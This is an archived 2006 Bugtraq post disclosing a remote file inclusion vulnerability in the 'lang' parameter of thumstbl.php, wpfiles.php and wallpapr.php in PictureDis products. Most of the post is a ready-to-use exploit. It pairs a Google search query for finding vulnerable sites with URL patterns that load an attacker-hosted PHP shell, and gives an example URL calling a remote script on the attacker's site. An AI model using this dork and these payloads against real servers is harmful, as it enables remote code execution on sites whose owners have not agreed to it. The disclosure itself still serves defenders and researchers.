PictureDis Products "lang" Parameter File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PictureDis Products "lang" Parameter File Inclusion Vulnerability
From: root-hacked@xxxxxxxxxxx
Date: 15 Jun 2006 20:41:55 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

**************************************************************************************************

PictureDis Products "lang" Parameter File Inclusion Vulnerability  
=================================================
Input passed to the "lang" parameter in thumstbl.php, wpfiles.php,
and wallpapr.php is not properly verified before being used to
include files. This can be exploited to execute arbitrary PHP code by
including files.

*********************************************************************************************
exploit:

in google search: inurl:thumstbl.php

 and add the phpshell

thumstbl.php?lang=[ur phpshell ]
wpfiles.php?lang=[ur phpshell ]
wallpapr.php?lang=[ur phpshell ]
******************************************************************

exemple: http://localhost//album/wpfiles.php?lang=http://your site.com/ur 
script.txt?
*************************************************
by s4mi(rOoT-HacKeD)rOoT-HaCkeD[AT]Hotmail[dot]com 
====================================
tanx to ==>SIMO64==>DrAcKaNz==>HaRDoSe==> 
*************************************************
black spell te4m [15-06-2006]


end  (-:
*************************************************

Prev by Date: Youtube.com - XSS & cookie disclosure
Next by Date: Bingbox.com - XSS & cookie disclosure
Previous by thread: Youtube.com - XSS & cookie disclosure
Next by thread: Bingbox.com - XSS & cookie disclosure
Index(es):
- Date
- Thread